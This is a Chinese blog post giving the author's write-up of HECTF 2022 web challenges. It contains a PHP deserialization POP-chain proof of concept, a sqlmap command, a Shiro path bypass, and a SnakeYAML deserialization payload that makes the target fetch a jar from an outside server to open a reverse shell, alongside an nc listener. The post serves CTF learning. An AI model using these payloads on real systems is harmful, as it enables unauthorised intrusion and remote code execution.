[HECTF 2022]—Web WirteUp

已于 2022-11-09 09:17:48 修改
阅读量584 收藏 1
点赞数 2
分类专栏: WP CTF 文章标签: 前端 php 开发语言
于 2022-11-08 23:21:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54902210/article/details/127760992
版权
CTF 同时被 2 个专栏收录
23 篇文章 1 订阅
订阅专栏
WP
20 篇文章 1 订阅
订阅专栏

文章目录

迷路的小狮

从头到尾凭猜,凭感觉。。。

  1. 访问/hebnu
  2. 切换为POST请求
  3. 将referer 改为 河北师范的官网地址
  4. 修改xff为127.0.0.1
  5. 得到jsfuck解码

在这里插入图片描述

擎天注

没做这道题贴一个社团公众号的wp

python3 sqlmap.py -u http://url/?id=1 --dbs -batch
image-20221108222908383

flag 在 ctf 库下的 3eDf4f07efC9ee16 表下 flag
在这里插入图片描述

easy_unserialize

一直在想怎么绕wakeup,后来才发现有一个__issert()魔法方法开始没注意到

<?php
error_reporting(0);
class A{
    public $file;

    public function __construct(){
        echo "Welcome to HECTF Have fun!!!😊<br>";
    }

    public function __wakeup(){
        if(isset($this->file->var)){
            $this->file = "flag.php";
        }
        else{
            $this->file = "index.php";
        }
    }
    public function __destruct(){
        highlight_file($this->file);
    }
}

class B{
    public $str;
    public $huang;
    public  function __isset($arg)
    {
        echo "难道我真的要失败了,吗".$this->str;

    }
    public function __call($fun1,$arg)
    {
        return $this->huang->str;

    }
}

class C{
    public $eee;
    public $aaa="who are you?";
    public $ccc;
    public function __toString()
    {
          $this->eee->flag();
    }
    public function __get($css)
    {
        $function = $this->ccc;
        return $function();
    }
}

class D{
    private $ddd;
    private $ext;

    public function flag(){
        $this->ext->nisa($this->ddd);
    }

    public function __invoke()
    {
        echo new $this->ddd($this->ext);
    }

}
$gagaga = new A();
unserialize(serialize($gagaga));

$data = $_POST['data'];
unserialize($data);

unserialize会调用A.__wakeup() ,wakeup里有isset,会调用B.__isset会执行echo,调用C.__toString会调用flag(),flag()方法不存在会调用B.__call,retrun str属性 属性不存在调用C.__get(),function()类当做方法使用会调用__invoke()

__invoke()里边 是echo new a ( a( a(b)的形式 ,可以触发反序列化原生类,具体可参考之前写的:PHP反序列化原生类利用

POC:

<?php

class A{
    public $file;

}

class B{
    public $str;
    public $huang;

}

class C{
    public $eee;
    public $aaa;
    public $ccc;

}

class D{
    public $ddd;
    public $ext;



}

$gagaga  = new A();
$gagaga->file=new B();
$gagaga->file->str =new C();
$gagaga->file-> str -> eee = new B();
$gagaga->file-> str -> eee -> huang = new C();
$gagaga->file-> str -> eee -> huang ->ccc = new D();
$gagaga->file-> str -> eee -> huang ->ccc ->ddd ="SplFileObject";
$gagaga->file-> str -> eee -> huang ->ccc ->ext ="php://filter/read=convert.base64-encode/resource=../../../ffflllllaaaaaaggggg.txt";

echo serialize($gagaga);

注:
$ddd和$ext属性是私有的所以链子构造好后需要在前边加上%00D%00,并且长度+3,其次flag分成了两行SplFileObject直接读不出来,需要用伪协议的方式读取

littleJava

本地打通了,但不知道为什么当时题目环境不出网,还以为要写内存马,写了半天也没打通,最后看了WP原来是出网的,也不知道反弹shell时候哪里出了问题。。。。。

shiro权限绕过

题目中添加了添加authc拦截器,/admin/*的请求会被拦截,但存在绕过如/admin/*/后边加个斜杠"\",即可绕过,所以访问/admin/hello/即可
在这里插入图片描述

snakeYaml反序列化

请求/admin/hello/后就能通过data进行yaml反序列化

@RequestMapping({"/admin/hello"})
@ResponseBody
public String admin(@RequestParam(name = "data",required = false) String data, Model model) throws Exception {
    try {
        if (data.startsWith("!!")) {
            return "Hacker!!!";
        } else {
            Yaml yaml = new Yaml();
            yaml.load(data);
            return "Good Yaml";
        }
    } catch (Exception var4) {
        return "Give me one data!";
    }
}

可以直接用现成项目,构造反弹shell命令

在这里插入图片描述

生成对应jar包

javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .

将生成的yaml-payload.jar,放到vps上,并监听反弹shell端口

nc -lvnp 10000

最后是构造反序列化,由于上边过滤了!!,因此需要bypass

!<tag:yaml.org,2002:javax.script.ScriptEngineManager> 
[!<tag:yaml.org,2002:java.net.URLClassLoader>
[[!<tag:yaml.org,2002:java.net.URL> 
["http://ip/yaml-payload.jar"]]]]

成功反弹shell
在这里插入图片描述

easyJava

题目提示CC、CB、C3P0…

没有给jar包只是一个没有过滤的反序列化:

package com.butler.easyjava.MyController;

import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.ResponseBody;

import java.io.ByteArrayInputStream;
import java.io.ObjectInputStream;
import java.util.Base64;

@Controller
public class HelloController {
    @RequestMapping({"/"})
    @ResponseBody
    public String index(@RequestParam(name = "data", required = false) String data) throws Exception {
        try{
            ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Base64.getDecoder().decode(data));
            ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
            objectInputStream.readObject();
            System.out.println(data);
            return "Success";
        } catch (Exception e){
            return "Please Post RequestParam data=";
        }
    }
}

尝试了下CC没打通,寻思可能内部有啥waf就没打,结果用无CC依赖CB就能直接打通。下次再有一定要都试试!!!!

newphp

和以往php原生类利用不同没有echo,不过能直接搜到利用方式

  • https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b
  • https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/

后记

剩下的是phar、pickle反序列化,没环境不打了

S1nJa
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HECTF 2022
weixin_57449426的博客
11-07 514
师傅们都tql
HECTF2021-0kam1-wirteup.pdf
11-16
HECTF2021-0kam1-wirteup.pdf
HECTF2022
mumuzi的博客
11-08 2974
今年是第三次参加HECTF,成绩不是很好wp随便看看就好了 文章目录Misc咦~小鲨鱼来喽舞者的秘密你把我flag藏哪去了?来玩捉迷藏呀我的手要不行辣2022HECTF调查问卷Crypto流动的音符matrixezrsamixtureReverseapk贝斯helloiosrunWeb迷路的小狮擎天注Pwn真·签到 Misc 咦~小鲨鱼来喽 直接打开流量包翻tcp流量即可 HECTF{i0hate0flow0analysis896} 舞者的秘密 直接爆破压缩包得到密码为456123,接着用GIFFram
HECTF2022 Crypto WP
qq_73824585的博客
11-07 287
速速来看HECTF2022密码题解
HECTF2022 学习笔记
一颗小白菜的博客
11-15 345
将图片格式改为gif,发现动图中有字符,通过Gifsplitter分离每一帧,找出里面的字符拼接在一起就是flag。先爆破出压缩包密码,用010打开,发现文件开头是gif的格式。用vim打开otherflag.txt,发现是零宽度隐写。可能为隐藏文字,通过文件->选项->显示,勾选隐藏文字。结束语:太菜了,就会做一点点简单的,还要多加学习!查看最后面的http数据包,发现flag。base64解密后,得到一串无规律字符。将两部分字符串合在一起,通过。网站解密得到另一串字符。
2022HECTF部分WP
qq_63928796的博客
11-07 562
扫描目录找到找到/.htases目录提示访问之后,看路由去1目录提示hebnu,之后让用post方式,返回后是乱码可以用谷歌插件之后改referer头flag在ctf库下的3eDf4f07efC9ee16表下flag字段。
[HECTF] JamesHarden
weixin_51804748的博客
11-14 134
一道简单的misc题,下载附件后打开压缩包 将这个无后缀的文件先放入010中看看,判断文件类型 看到以PK开头可初步确认为压缩包,将后缀名改为zip后成功打开 压缩包中是一个.class文件,这里应该使用java反编译来解析.class文件,还原成java代码来寻找信息 打开.class文件后发现字符串URPGS{Jr1p0zr_G0_U3pg6_!},这个字符串和flag的形式很像,但是其中的字母应该经过了移位,用凯撒密码来解密 将位移设为14解出真正的flag ...
萌新的第一场CTF——HECTF
mumuzi的博客
11-25 3026
第一次打真正意义上的CTF比赛 之前有名必报,之后发现只会做签到 祥云杯也就康康就走了 这几天看了知乎的大佬,只学了3个月都能拿30名,而我只能拿75感觉有点捞 所以我就把我能做起的WP给大家分享一下 MISC 1.png: 对于图片题,最简单的要有几种思想:1.属性,2.winhex头尾,3.图片高度,4.stegsolve,5.foremost,6.LSB隐写。 这道题后用winhex打开后,发现文件尾有base64编码:M2I3OWJkZjhmY2ZkNTVmZH0= 解码得到:3b79bdf8fc
hectf赛事记录
qq_42943192的博客
11-06 413
hectf赛事记录WEB记录Web2Web3web5Web6Web7Web8 WEB记录 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 Web2 利用文件读取,和一些绕过,读取文件,读出base64 接着base64解码即可得到:flag{He6TuCTF@:F1a...
HECTF 部分wp
Sentiment的博客
11-15 4475
Web EDGnb(签到) docker run -it moth404/edgnb 执行后发现有很多flag,但都是空的,推测flag应该不在容器内部 查看docker history,容器构建记录 docker history moth404/edgnb 发现flag但是显示不全 用 --no-trunc=true进行不截断输出,看到flag docker history moth404/edgnb --no-trunc=true 或者可以在dockerhub上直接看记录 mmmmd5d5d
2021HECTF mmmmd5d5d5d5
bwt_D的博客
11-15 4664
打开页面之后发现只有中间有几行字,直接查看源代码 源码中发现了php代码,是弱比较。直接使用数组绕过 payload: ?a[]=1&b[]=2 之后进入页面 发现此页面是让你输入一个字符串经过MD5加密后的第六到第十位等于等号后面的数字,这里我们直接使用脚本爆破 注意:经过尝试字符串只能为数字 #coding=utf-8 from multiprocessing.dummy import Pool as tp import hashlib knownMd5 = 'e012c' def m
[wp] HECTF2019 让我们一起来变魔术吧
MercyLin的博客
11-05 1304
<?php class Read { public $var; public $token; public $token_flag; public function __construct() { $this->token_flag = $this->token = md5(rand(1,10000)); } pub...
HECTF部分WP
星|Donstpast
01-09 414
本次比赛成绩还算勉强看的过去吧,不是很拉胯。经历了大师傅们最后的冲分以及分比重的调整,最终停在了24的位置,这里写一下做出来的题目的WP。 MISC 1.png 下载题目,是一张小猫猫。 多年杂项手的经验告诉我,这个图片必然改高度。用010editor打开, 为了方便直接修改个大点的高度, 获得了其中一半的flag。此时闲来无事,将内容往下拖,在文本内容的最后发现了熟悉的base64. 在线base64解密,获得后半部分。 flag:flag{94ed7fdae8f504743b79bdf8fcfd55f
2021 HECTF 部分WP
qq_52988816的博客
11-17 964
MISC 快来公众号ya 关注公众号回复签到 SangFor{AaKjtQr_OjJpdA3QwBV_ndsKdn3vPgc_} JamesHarden 一个未知文件,拖入010 发现是zip的前缀,改个文件后缀压缩 是一个.class文件,没见过,用记事本打开 发现疑是凯撒密码的字符串 解密 hectf{we1c0me_t0_h3ct6_!} 捉迷藏 解压是个word文件,打开后没发现啥,查看是否隐藏了字段,也没有发现 托010 是个压缩包,改ziP解压 全是.xml 挨个看 在document.xm
HackTheBox Precious CVE-2022-25765利用,YAML反序列化攻击提权
Ba1_Ma0的博客
12-12 1825
HackTheBox靶机
[HDCTF2023] NSSweb方向题解
最新发布
Leaf_initial的博客
05-06 1586
Smarty是基于PHP开发的,对于Smarty的SSTI的利用手段与常见的flask的SSTI有很大区别。了解过Jinjia2模板注入的同学应该知道,jinjia2是基于python的,而Smarty是基于PHP的,所以理解起来还是很容易,我们只需要达到命令执行就可以了。
php中关于一些$a($b)
qq_63928796的博客
11-10 1475
上一篇总结了一些ctf常用的原生类,这一篇看一下原生类的利用,大都是new $a($b)类型。
[Java反序列化]—SnakeYaml反序列化
Sentiment的博客
11-20 2003
SnakeYaml是一个完整的YAML1.1规范Processor,用于解析YAML,序列化以及反序列化,支持UTF-8/UTF-16,支持Java对象的序列化/反序列化,支持所有YAML定义的类型。题目中添加了添加authc拦截器,/admin/*的请求会被拦截,但存在绕过如/admin/*/后边加个斜杠"\",即可绕过,所以访问/admin/hello/即可。,首先获取要调用的类名也就是SPI1,通过反射获取该类,接着通过newInstance进行实例化,并retrun返回。
spring cloud SnakeYAML RCE复现
qq_27862405的博客
05-30 2119
一、漏洞成因:   spring cloud在低版本下的 SnakeYAML 依赖组件存在反序列漏洞 二、漏洞复现 1、漏洞环境: 服务器:127.0.0.1 kali攻击机:192.168.174.130 下载漏洞环境: SpringBootVulExploit/repository/springcloud-snakeyaml-rce at master · LandGrey/SpringBootVulExploit · GitHub 2、在IEDA中打开下载好的项目(这里注意需要更.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值